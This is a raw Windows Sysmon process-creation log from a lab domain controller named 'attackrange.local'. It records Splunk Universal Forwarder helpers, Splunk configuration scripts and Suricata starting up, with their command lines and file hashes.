AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000021900Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:47:21.199{A8622C2F-43E9-6078-7205-00000000AE01}4912C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000021890Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:47:20.387{A8622C2F-43E8-6078-7105-00000000AE01}2484C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000021881Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:47:18.606{A8622C2F-43E6-6078-7005-00000000AE01}6104C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000021871Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:47:17.949{A8622C2F-43E5-6078-6F05-00000000AE01}4400C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000021862Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:47:17.121{A8622C2F-43E5-6078-6E05-00000000AE01}6348C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000021753Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:23.482{A8622C2F-43AF-6078-6D05-00000000AE01}6664C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000021738Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:22.669{A8622C2F-43AE-6078-6C05-00000000AE01}6996C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe8.0.2Monitor windows event logssplunk ApplicationSplunk Inc.splunk-winevtlog.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=A735F697C6C533F20D023E4318824194,SHA256=295236CFB06A5F9C1F76EECC468F9A070BFCB5C4E094918059EC86BBB654E119,IMPHASH=85F4904CF3562658E303E53274ABD436{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000021729Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:21.857{A8622C2F-43AD-6078-6B05-00000000AE01}728C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000021718Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:21.185{A8622C2F-43AD-6078-6A05-00000000AE01}5428C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000021707Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:20.372{A8622C2F-43AC-6078-6905-00000000AE01}6488C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000021697Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:19.560{A8622C2F-43AB-6078-6805-00000000AE01}6296C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe8.0.2Performance monitorsplunk ApplicationSplunk Inc.splunk-perfmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=1F3027C93882E5D5A667B84CCEF3ED67,SHA256=504CDB3742BCBF617C837270CCEC0243205B7BF0A6AB5117EFB838DD2F004AAC,IMPHASH=53D37CD53647C5D82FCFA9E6970E154E{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000021689Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:18.747{A8622C2F-43AA-6078-6705-00000000AE01}7012C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000021677Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:17.935{A8622C2F-43A9-6078-6605-00000000AE01}5364C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000021667Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:17.122{A8622C2F-43A9-6078-6505-00000000AE01}6672C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000021653Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:16.232{A8622C2F-43A8-6078-6405-00000000AE01}6952C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe8.0.2Remote Performance monitor using WMIsplunk ApplicationSplunk Inc.splunk-wmi.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=5DA29397A44401083341D66B52CA8BC4,SHA256=F51A58BCBF3532B9EF1B6478839424C33EA0426BCD5C6B4B636AD25D5177379C,IMPHASH=FFEB0CD073A55A73D08AC443E4942F81{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000021617Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:15.161{A8622C2F-43A7-6078-6105-00000000AE01}3856C:\Program Files\Suricata\suricata.exe-----"C:\Program Files\Suricata\suricata.exe" -c suricata.yaml -i 10.0.1.14C:\Program Files\Suricata\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F71119BB29D8003E33B6D798832F79A6,SHA256=6C40784E11FDB84C494FB788F9D2C322118F623C5A30D107C194963EAFA16C2F,IMPHASH=C0B51F782FE20AFB51B03C0EE0969EE4{A8622C2F-4359-6078-1605-00000000AE01}2596C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe" "C:\Program Files\SplunkUniversalForwarder\etc\apps\TA-suricata-4\suricata.ps1" 154100x800000000000000021609Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:15.560{A8622C2F-43A7-6078-6205-00000000AE01}3752C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe-----"C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=9916D1AB54ACD0592052F87DFDBFD5F8,SHA256=704C0DEC2F15B4ADBC3165475D0F6504C90AD8B28B6926F7EAD67C2F2CCE77F5,IMPHASH=B0958DE096151B4209C7AECE2483DEF3{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000021576Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:13.014{A8622C2F-43A5-6078-5F05-00000000AE01}5896C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe-----"C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe" --schemeC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=9916D1AB54ACD0592052F87DFDBFD5F8,SHA256=704C0DEC2F15B4ADBC3165475D0F6504C90AD8B28B6926F7EAD67C2F2CCE77F5,IMPHASH=B0958DE096151B4209C7AECE2483DEF3{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000021568Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:12.905{A8622C2F-43A4-6078-5E05-00000000AE01}2424C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\powershell2.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000021560Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:12.795{A8622C2F-43A4-6078-5D05-00000000AE01}4664C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\powershell.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000021552Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:12.686{A8622C2F-43A4-6078-5C05-00000000AE01}7120C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\perfmon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000021544Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:12.576{A8622C2F-43A4-6078-5B05-00000000AE01}6516C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\admon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000021536Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:12.467{A8622C2F-43A4-6078-5A05-00000000AE01}1088C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinRegMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000021528Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:12.358{A8622C2F-43A4-6078-5905-00000000AE01}6944C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinPrintMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000021520Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:12.248{A8622C2F-43A4-6078-5805-00000000AE01}6748C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinNetMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000021512Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:12.140{A8622C2F-43A4-6078-5705-00000000AE01}6740C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinHostMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000021504Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:12.030{A8622C2F-43A4-6078-5605-00000000AE01}6292C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinEventLog.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000021496Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:11.914{A8622C2F-43A3-6078-5505-00000000AE01}7136C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\MonitorNoHandle.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000021487Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:11.666{A8622C2F-43A3-6078-5405-00000000AE01}6376C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{A8622C2F-43A3-6078-5305-00000000AE01}1564C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt 2>&1 154100x800000000000000021479Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:11.660{A8622C2F-43A3-6078-5305-00000000AE01}1564C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt 2>&1C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000021469Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:11.356{A8622C2F-43A3-6078-5205-00000000AE01}6364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-43A3-6078-5105-00000000AE01}6268C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 154100x800000000000000021461Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:11.349{A8622C2F-43A3-6078-5105-00000000AE01}6268C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT 